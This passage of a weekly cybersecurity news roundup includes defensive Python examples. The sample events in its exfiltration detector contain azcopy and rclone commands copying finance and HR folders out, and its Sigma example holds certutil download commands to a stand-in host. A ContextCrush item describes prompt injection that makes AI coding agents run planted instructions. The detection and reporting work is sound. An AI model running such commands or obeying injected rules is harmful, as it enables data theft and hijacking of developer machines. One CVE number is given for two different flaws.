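# Bulk-copy utilities ransomware crews use for exfiltration (Rclone, now AzCopy).
EXFIL_TOOLS = {"azcopy", "azcopy.exe", "rclone", "rclone.exe"}
# Azure Storage endpoints take the form <account>.blob|file|dfs.core.windows.net
STORAGE_URL_RE = re.compile(
    r"https://([a-z0-9]{3,24})\.(?:blob|file|dfs)\.core\.windows\.net", re.IGNORECASE
)
# Shared access signature parameters embedded in the destination URL.
SAS_RE = re.compile(r"[?&](?:sv|sig|se|sp)=", re.IGNORECASE)


def detect_cloud_exfil(events: Iterable[Dict[str, str]], allowed_accounts: Set[str]) -> List[Dict[str, str]]:
    """Return one alert per azcopy/rclone execution, graded by where the data goes."""
    allowed = {a.lower() for a in allowed_accounts}
    alerts: List[Dict[str, str]] = []
    for ev in events:
        image = ev.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
        if image not in EXFIL_TOOLS:
            continue
        cmd = ev.get("cmdline", "")
        accounts = {m.group(1).lower() for m in STORAGE_URL_RE.finditer(cmd)}
        unknown = sorted(accounts - allowed)
        if unknown:
            severity = "high"
            reason = f"{image} targets storage account(s) outside the allowlist: {', '.join(unknown)}"
        elif accounts:
            severity = "low"
            reason = f"{image} targets approved account(s): {', '.join(sorted(accounts))}"
        else:
            # rclone remotes and azcopy logins can hide the destination in config;
            # that absence is itself worth a look.
            severity = "medium"
            reason = f"{image} run without an Azure Storage URL on the command line (destination hidden in a remote/config)"
        if SAS_RE.search(cmd):
            reason += "; SAS token passed on the command line"
        alerts.append({"host": ev.get("host", "?"), "user": ev.get("user", "?"),
                       "severity": severity, "reason": reason})
    return alerts


# Constructed process-creation events (generic fields, not a specific EDR schema).
SAMPLE_EVENTS = [
    {"host": "BKP01", "user": r"CORP\backupsvc", "image": r"C:\Program Files\azcopy\azcopy.exe",
     "cmdline": r"azcopy.exe copy D:\Backups https://corpbackup01.blob.core.windows.net/nightly --recursive"},
    {"host": "FS02", "user": r"CORP\jdoe", "image": r"C:\Users\jdoe\Downloads\azcopy.exe",
     "cmdline": r'azcopy.exe copy "C:\Finance" "https://stx7f2q9.blob.core.windows.net/out?sv=2024-11-04&ss=b&sig=REDACTED" --recursive'},
    {"host": "FS02", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Finance\q1.txt"},
    {"host": "HR03", "user": r"CORP\svc_hr", "image": r"C:\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy C:\HR dump:exports --transfers 16"},
]
# Storage accounts the (constructed) organisation owns and expects bulk copies to.
ALLOWED_STORAGE_ACCOUNTS = {"corpbackup01"}

if __name__ == "__main__":
    for alert in detect_cloud_exfil(SAMPLE_EVENTS, ALLOWED_STORAGE_ACCOUNTS):
        print(alert["severity"].upper(), alert["host"], alert["user"], alert["reason"])
```

The allowlist is the whole point: without it, AzCopy traffic to a storage account the attacker spun up minutes earlier looks identical to the nightly backup. The "medium" branch matters for rclone, whose destination lives in a configured remote rather than on the command line, so the command itself cannot be cleared and has to be checked against the host's rclone config.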
“The adoption of AzCopy and other familiar tools by attackers represents a similar logic to living-off-the-land in the final and most critical phase of an operation: exfiltrating data out of an organization,” Varonis said. “Spinning up an Azure storage account takes minutes and requires only a credit card or compromised credentials. The attacker gains the benefits of Microsoft’s global infrastructure while security teams struggle to distinguish between malicious uploads and legitimate traffic.”

Threat Actors Exploit Critical Flaw in WPEverest Plugin — Threat actors are exploiting a critical security flaw in WPEverest’s User Registration & Membership plugin (CVE-2026-1492, CVSS score: 9.8) to create rogue administrator accounts. The vulnerability affects all versions of User Registration & Membership through 5.1.2.
The issue has been addressed in version 5.1.3. Wordfence said the plugin is susceptible to improper privilege management, which enables the creation of bogus admin accounts. “This is due to the plugin accepting a user-supplied role during membership registration without properly enforcing a server-side allowlist,” it said. “This makes it possible for unauthenticated attackers to create administrator accounts by supplying a role value during membership registration.”

MuddyWater Evolves Its Tactics — The Iranian hacking group known as MuddyWater has been observed leveraging Shodan and Nuclei to identify potentially vulnerable targets, as well as using subfinder and ffuf to enumerate target web applications.
The findings come from an analysis of the threat actor’s VPS server hosted in the Netherlands. MuddyWater is also said to be attempting to scan and/or exploit recently disclosed CVEs related to BeyondTrust (CVE-2026-1731), Ivanti (CVE-2026-1281), n8n (CVE-2025-68613), React (CVE-2025-55182), SmarterMail (CVE-2025-52691), Laravel Livewire (CVE-2025-54068), N-Central (CVE-2025-9316), Citrix NetScaler (CVE-2025-5777), Langflow (CVE-2025-34291), and Fortinet (CVE-2024-55591, CVE-2024-23113, CVE-2022-42475), along with SQL injection vulnerabilities in BaSalam and an unspecified Postgres development platform, for initial access. One of the custom tools identified on the server is KeyC2, a command-and-control (C2) framework that allows operators to remotely control compromised Windows machines over a custom binary protocol on port 1269 from a Python script. Two other C2 tools used by the adversary are PersianC2, which relies on standard HTTP polling to receive commands and files via JSON API endpoints, and ArenaC2, a Python-based program that operates over HTTP POST requests.
Also detected is a PowerShell loader that leads to the execution of obfuscated Node.js payloads resembling those of the Tsundere Botnet. The infrastructure is assessed to have been used to target entities in Israel, Egypt, Jordan, the U.A.E., and the U.S. Some aspects of the activity overlap with Operation Olalampo.

2,622 Valid Certificates Exposed — A new study by Google and GitGuardian found over a million unique private keys leaked across GitHub and Docker Hub, of which 40,000 were mapped to 140,000 real TLS certificates.
“As of September 2025, 2,600 of these certificates were valid, with more than 900 actively protecting Fortune 500 companies, healthcare providers, and government agencies,” GitGuardian said. “Our disclosure campaign achieved 97% remediation, but at the cost of 4,300 emails sent, 1,706 entities contacted, 9 bug bounty submissions, countless follow-ups, and days of meticulous attribution work employing multiple OSINT techniques. The high success rate masks the extraordinary effort required to protect organizations that fail to protect themselves.”

Context7 MCP Server Suffers from ContextCrush — A critical security flaw has been discovered in Upstash’s Context7 MCP Server, a widely used tool for delivering documentation to AI coding assistants. Dubbed ContextCrush, the vulnerability could allow attackers to inject malicious instructions into AI development tools through a trusted documentation channel.
Noma Security, which disclosed details of the flaw, said it’s rooted in the platform’s “Custom Rules” feature, which allows library maintainers to provide AI-specific instructions to help assistants better interpret documentation. “Context7 operates both as the registry, where anyone can publish and manage library documentation, and as the trusted delivery mechanism that pushes content directly into the AI agent’s context,” security researcher Eli Ainhorn said. “The attacker never needs to reach the victim’s machine. Instead, the attacker can plant malicious custom rules in Context7’s registry, and Context7’s infrastructure delivers them through the MCP server to the AI agent running in the developer’s IDE.
As agents are execution machines and run whatever is loaded into their context, all the victim’s agent does is execute the attacker’s instructions on the victim’s machine, using its own tool access (Bash, file read/write, network). In this scenario, the agent has no way to distinguish between legitimate documentation and attacker-controlled content because they arrive through the same trusted channel and from the same trusted source.”

German Court Sentences Key Person Behind Call Center Scam — A German court has sentenced a suspected central figure in the so-called Milton Group call-center fraud network to seven-and-a-half years in prison. Although the court did not publicly name the defendant, court records reviewed by the Organized Crime and Corruption Reporting Project (OCCRP) indicate the person convicted was Mikheil Biniashvili, a citizen of Georgia and Israel. In addition to the prison sentence, the court ordered the confiscation of €2.4 million ($2.8 million) linked to the operation.
Between 2017 and 2019, the defendant ran a call-center operation in Albania that used trained agents to persuade victims to invest in fraudulent online trading schemes. The scheme caused losses of about €8 million ($9.4 million) to victims, mostly in German-speaking countries. The operation employed up to 600 people at its peak. Call-center agents allegedly posed as investment advisers, building trust with targets before persuading them to deposit funds into fake trading platforms controlled by the network by promising large investment returns.
Biniashvili was arrested in Armenia in 2023 and extradited to Germany in 2024.

Multiple Flaws in Avira Internet Security — Three vulnerabilities have been disclosed in Avira Internet Security that could allow for arbitrary file deletion (CVE-2026-27748) in the Software Updater component, insecure deserialization (CVE-2026-27749) in System Speedup, and arbitrary folder deletion via a time-of-check/time-of-use (TOCTOU) race (CVE-2026-27748) in the Optimizer. “The file delete primitive is useful on its own,” Quarkslab said. “The other two both result in Local Privilege Escalation to SYSTEM.”

Russian Ransomware Operator Pleads Guilty in U.S. — Evgenii Ptitsyn, a 43-year-old Russian national, has pleaded guilty in a U.S. court to running the Phobos ransomware operation that targeted more than 1,000 victims globally and extorted ransom payments worth over $39 million. Ptitsyn was extradited from South Korea in November 2024. “Beginning in at least November 2020, Ptitsyn and others conspired to engage in an international computer hacking and extortion scheme that victimized public and private entities through the deployment of Phobos ransomware,” the Justice Department said.
“As part of the scheme, Ptitsyn and his co-conspirators developed and offered access to Phobos ransomware to other criminals or ‘affiliates’ to encrypt victims’ data and extort ransom payments from victims. The administrators operated a darknet website to coordinate the sale and distribution of Phobos ransomware to co-conspirators and used online monikers to advertise their services on criminal forums and messaging platforms.” Ptitsyn faces a maximum penalty of 20 years in prison on the wire fraud charges.

Fake Google Security Check Leads to RAT — A bogus website resembling the Google Account security page is being used to deliver a Progressive Web App (PWA) capable of harvesting one-time passcodes and cryptocurrency wallet addresses, and of proxying attacker traffic through victims’ browsers. “Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device’s contact list, real-time GPS location, and clipboard contents – all without installing a traditional app,” Malwarebytes said.
“For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording.” Phishing Campaign Abuses Google Infrastructure — A new email phishing campaign is leveraging legitimate Google infrastructure to bypass standard security filters. The activity uses Google Cloud Storage (GCS) to host the initial phishing URLs, which, when clicked, redirect unsuspecting users to a malicious site designed to capture their financial information or deploy malware. “By hosting the initial link on Google’s servers, the attackers ensure the email passes authentication checks like SPF and DKIM,” security researcher Anurag Gawande said. Client-Side Injection Conducts Ad Fraud — A new malicious client-side injection, originating from a browser extension impersonating Microsoft Clarity, has been found to overwrite referral tokens and redirect affiliate revenue to unknown threat actors.
“A browser extension is injecting obfuscated JavaScript from msclairty[.]com, a typosquatted domain impersonating Microsoft Clarity,” c/side’s Simon Wijckmans said. “The domain is not serving analytics. It is delivering an obfuscated JavaScript payload that performs affiliate cookie stuffing, tracking cookie deletion, and Fetch API hijacking inside the visitor’s browser. This prevents a competing tracking service from recording the real traffic source.
The attacker does not just want credit for the visit. They actively block other trackers from capturing any attribution data that would conflict with their fraudulent cookie.” The script has affected sites across multiple unrelated sectors, including transportation, SaaS platforms, sports management, and government payment portals. Impacted visitors primarily span Chrome versions 132, 138, and 145, and originate from U.S.-based IP addresses on the East and West coasts. Illinois Man Charged with Hacking Snapchat Accounts to Steal Nudes — U.S.
prosecutors have charged a 26-year-old Illinois man, Kyle Svara, with conducting a phishing operation that made it possible to break into the Snapchat accounts of approximately 570 women to steal private photos and sell them online. “From at least May 2020 to February 2021, Svara used social engineering and other resources to collect his targets’ emails, phone numbers, and/or Snapchat usernames,” the Justice Department said. “He then used those means of identification to access his targets’ Snapchat accounts, which prompted Snap Inc. to send account security codes to those women.
Using anonymized phone numbers, Svara posed as a representative of Snap Inc. and sent more than 4,500 text messages to hundreds of women, requesting those Snapchat access codes.” Svara is alleged to have accessed the Snapchat accounts of at least 59 women without permission to download their nude or semi-nude images and sell them on internet forums. Meta Sued Over AI Smart Glasses’ Privacy Concerns — Meta is facing a new class action lawsuit over its AI-powered Ray-Ban Meta glasses, following a report from Swedish newspapers Svenska Dagbladet and Goteborgs-Posten that employees at Kenya-based subcontractor Sama are reviewing intimate, personal footage filmed from customers’ glasses. Meta said subcontracted workers might sometimes review content captured by its AI smart glasses for the purpose of improving the “experience,” as stated in its Privacy Policy.
It also claimed that the data is filtered to protect people’s privacy, but the investigation found that this step did not always work. “Unless users choose to share media they’ve captured with Meta or others, that media stays on the user’s device,” Meta told BBC News. “When people share content with Meta AI, we sometimes use contractors to review this data for the purpose of improving people’s experience, as many other companies do.” Total Ransomware Payments Stagnated in 2025 — Total ransomware payments stagnated in 2025, even as the number of attacks increased.
According to blockchain analysis firm Chainalysis, total on-chain ransomware payments fell by approximately 8% to $820 million in 2025, even as claimed attacks rose 50%. “While aggregate revenue stagnated, the median ransom payment grew 368% year-over-year to nearly $60,000,” the company said. “The 2025 total is likely to approach or exceed $900 million as we attribute more events and payments, just as our 2024 total grew from our initial $813 million estimate this time last year.” The decline in payment rates from 63% in 2024 to just 29% last year indicates that fewer victims are yielding to attackers’ ransom demands, it added. The development comes amid increased fragmentation of the ransomware ecosystem and a shift by threat actors towards stealthier methods, such as defense evasion and persistence techniques, that prioritize data theft and prolonged, low-noise access.
Mobile Blockchain Wallet Found Vulnerable to Severe Flaws — An unnamed mobile blockchain wallet app for Android has been found susceptible to two independent severe vulnerabilities: untrusted deep links could trigger sensitive wallet flows and trick users into approving phishing-driven transactions, and the app retained the cryptographic private keys on the device after the account was deleted. The latter meant that an attacker with later access to the device could re-import the account using only its public address and regain full signing authority without ever re-entering the keys. According to LucidBit Labs, the vulnerabilities have been patched by the developer. “The main strength of crypto wallets lies in their cryptographic foundations,” security researcher Assaf Morag said.
“However, when these wallets are implemented as user-facing applications, the overall orchestration of the system becomes just as critical as the cryptography itself. As the saying goes, a system’s security posture is defined by its weakest link. In this case, the two vulnerabilities demonstrate how flaws at the application layer can undermine the entire security model, despite the strength of the underlying cryptography.” Kubernetes RCE Via Nodes/Proxy GET Permission — New research has identified an authorization bypass in Kubernetes Role-based access control (RBAC) that allows a service account holding only GET on the nodes/proxy subresource to execute commands in any Pod in the cluster. The issue stems from how the Kubelet authorizes WebSocket connections.
“Nodes/proxy GET allows command execution when using a connection protocol such as WebSockets,” security researcher Graham Helton said. “This is due to the Kubelet making authorization decisions based on the initial WebSocket handshake’s request without verifying CREATE permissions are present for the Kubelet’s /exec endpoint, requiring different permissions depending solely on the connection protocol. The result is anyone with access to a service account assigned nodes/proxy GET that can reach a Node’s Kubelet on port 10250 can send information to the /exec endpoint, executing commands in any Pod, including privileged system Pods, potentially leading to a full cluster compromise.” The Kubernetes project has declined to treat the issue as a vulnerability, stating that it is intended behavior. However, it is expected to release Fine-Grained Kubelet API Authorization (KEP-2862) next month, which addresses the attack.
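Until KEP-2862 lands, the practical defensive step is to find out which principals in a cluster actually hold `get` on `nodes/proxy`, since each of them is an /exec path to every Kubelet they can reach. The script below is an added example written for this article, not code from the researchers, Edera or the Kubernetes project. It operates on constructed ClusterRole and ClusterRoleBinding objects in the shape that `kubectl get clusterroles,clusterrolebindings -o json` returns (the role, binding and subject names are invented), and it reproduces the RBAC authorizer's matching rules: `*` wildcards on verbs, API groups and resources, an exact `resource/subresource` match, and the `*/subresource` form, which also grants `nodes/proxy`.

```python
"""Added example: enumerate who can 'get nodes/proxy' from RBAC objects (not project code)."""

# Constructed ClusterRoles and ClusterRoleBindings, shaped like `kubectl ... -o json` items.
# Names are invented for the illustration.
CLUSTER_ROLES = [
    {"metadata": {"name": "node-metrics-reader"},
     "rules": [{"apiGroups": [""], "resources": ["nodes/proxy", "nodes/metrics"], "verbs": ["get"]}]},
    {"metadata": {"name": "subresource-wildcard"},
     "rules": [{"apiGroups": ["*"], "resources": ["*/proxy"], "verbs": ["*"]}]},
    {"metadata": {"name": "pod-reader"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
]
CLUSTER_ROLE_BINDINGS = [
    {"metadata": {"name": "monitoring"},
     "roleRef": {"kind": "ClusterRole", "name": "node-metrics-reader"},
     "subjects": [{"kind": "ServiceAccount", "namespace": "monitoring", "name": "prometheus"}]},
    {"metadata": {"name": "legacy-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "subresource-wildcard"},
     "subjects": [{"kind": "Group", "name": "ops"}]},
    {"metadata": {"name": "readers"},
     "roleRef": {"kind": "ClusterRole", "name": "pod-reader"},
     "subjects": [{"kind": "ServiceAccount", "namespace": "default", "name": "app"}]},
]


def rule_grants(rule, verb, group, resource, subresource):
    """Mirror the RBAC authorizer: '*' matches any verb/group/resource, a resource
    entry matches the combined 'resource/subresource', and '*/sub' matches any
    resource's 'sub' subresource (but never the parent resource itself)."""
    verbs = rule.get("verbs", [])
    if "*" not in verbs and verb not in verbs:
        return False
    groups = rule.get("apiGroups", [])
    if "*" not in groups and group not in groups:
        return False
    combined = f"{resource}/{subresource}" if subresource else resource
    for r in rule.get("resources", []):
        if r == "*" or r == combined:
            return True
        if subresource and r.startswith("*/") and r[2:] == subresource:
            return True
    return False


def subjects_with(roles, bindings, verb="get", resource="nodes", subresource="proxy", group=""):
    """Return sorted (binding, subject) pairs whose ClusterRole grants the requested access.
    `group` defaults to "" because nodes live in the core API group."""
    granting = {
        r["metadata"]["name"] for r in roles
        if any(rule_grants(rule, verb, group, resource, subresource) for rule in r.get("rules", []))
    }
    found = []
    for b in bindings:
        ref = b["roleRef"]
        if ref["kind"] != "ClusterRole" or ref["name"] not in granting:
            continue
        for s in b.get("subjects", []):
            ns = f"{s['namespace']}/" if "namespace" in s else ""
            found.append((b["metadata"]["name"], f"{s['kind']}:{ns}{s['name']}"))
    return sorted(found)


if __name__ == "__main__":
    for binding, subject in subjects_with(CLUSTER_ROLES, CLUSTER_ROLE_BINDINGS):
        print(f"{subject} can 'get nodes/proxy' via ClusterRoleBinding {binding}")
```

To run this against a real cluster, replace the two constructed lists with the `items` arrays from `json.load` over the `kubectl` output. RoleBindings are deliberately ignored: nodes are cluster-scoped, so only a ClusterRoleBinding can grant access to them. Every principal this returns should be treated as able to reach /exec on any Kubelet it can connect to on port 10250 until the cluster is running with KEP-2862 enabled.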
“A targeted patch would require coordinated changes across multiple components with special-case logic,” Edera said. “This is the kind of complexity that could lead to future vulnerabilities. Once KEP-2862 reaches GA and sees adoption, nodes/proxy can be deprecated for monitoring use cases.” Other Key Stories on the Radar — The Israeli government is working on the country’s first cybersecurity law; the U.S. National Security Agency (NSA) published Zero Trust Implementation Guidelines (ZIGs) to help organizations safeguard sensitive data, systems, and services against sophisticated cyber threats; Google Project Zero found multiple vulnerabilities that could be used to bypass a new Windows 11 feature called Administrator Protection and obtain admin privileges; threat actors are continuing to abuse Microsoft Teams functionality by leveraging guest invitations and phishing-themed team names to impersonate billing and subscription notifications; and a loader named PhantomVAI has been used in the wild over the past year to deploy other payloads, such as Remcos RAT, XWorm, AsyncRAT, DarkCloud, and SmokeLoader.
🔧 Cybersecurity Tools DetectFlow → It is an open-source detection pipeline from SOC Prime that matches streaming log events against Sigma rules in real time — before they ever reach your SIEM. Instead of relying on your SIEM to do the heavy lifting, it tags and enriches events in-flight using Apache Kafka and Flink, then passes the results downstream to wherever you need them. Built on 11 years of detection intelligence, it’s designed for teams who want faster detection, more rule coverage, and less dependency on SIEM-imposed limits. ADTrapper → It is an open-source platform that analyzes Windows Active Directory authentication logs and flags threats using 54+ built-in detection rules — covering everything from brute force to AD CS attacks.
It runs in Docker, deploys with one command, and supports SharpHound data for deeper AD analysis. Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws.
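To make concrete what matching streaming events against Sigma rules before they reach the SIEM looks like, here is an added example written for this article, not DetectFlow's code and not a substitute for a real Sigma engine. It implements a deliberately small subset of the Sigma detection format (field maps where every key must match, `contains`/`startswith`/`endswith` modifiers, a list of values as OR, and `selection and not filter` style conditions), then tags matching process-creation events in flight the way such a pipeline would before forwarding them. The rule and the log events are constructed for the illustration.

```python
"""Added example: a minimal in-flight Sigma-style matcher and tagger (not DetectFlow code)."""

# Constructed Sigma-like rule: certutil used as a downloader, unless run as SYSTEM.
RULE = {
    "title": "Certutil Download",
    "tags": ["attack.command_and_control", "attack.t1105"],
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains": ["urlcache", "-split"],   # list of values = OR
        },
        "filter": {"User": "SYSTEM"},
        "condition": "selection and not filter",
    },
}

# Constructed process-creation events, as a log shipper might hand them to the pipeline.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://example.invalid/a.exe a.exe", "User": "alice"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -dump", "User": "alice"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://example.invalid/b.exe b.exe", "User": "SYSTEM"},
    {"Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer", "User": "bob"},
]


def _match_value(actual, modifier, expected):
    """Sigma string matching is case-insensitive; apply the field modifier, if any."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    return a == e


def _match_selection(selection, event):
    """A selection map is an AND over its keys; a list value is an OR over the list."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event[field], modifier, v) for v in values):
            return False
    return True


def matches(rule, event):
    """Evaluate a condition of the form 'a and b and not c' over the named selections.
    Real Sigma conditions also allow 'or', parentheses and aggregation; kept out here."""
    det = rule["detection"]
    result = True
    for term in det["condition"].split(" and "):
        negate = term.startswith("not ")
        name = term[4:] if negate else term
        hit = _match_selection(det[name], event)
        result = result and (hit != negate)
    return result


def tag_events(rule, events):
    """Return copies of the events, enriching each match with the rule title and ATT&CK tags
    so downstream consumers (SIEM or otherwise) receive pre-classified events."""
    tagged = []
    for ev in events:
        ev = dict(ev)
        if matches(rule, ev):
            ev["sigma_matches"] = [rule["title"]]
            ev["sigma_tags"] = list(rule["tags"])
        tagged.append(ev)
    return tagged


if __name__ == "__main__":
    for ev in tag_events(RULE, EVENTS):
        print(ev.get("sigma_matches", "-"), ev["User"], ev["CommandLine"])
```

The filter clause is the part worth studying: without it the SYSTEM-run certutil would also be tagged, which is the usual source of noise in downloader rules, and the matcher shows how `not filter` is evaluated alongside the positive selection rather than as a separate pass.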
Conclusion That’s your week. A lot happened. Some of it was bad, some of it was worse, and a little bit of it was actually good. The scoreboard is messy, like it always is.
Same time next week — and if history is any guide, we’ll have plenty more to talk about. Stay patched, stay skeptical, and maybe don’t click that link.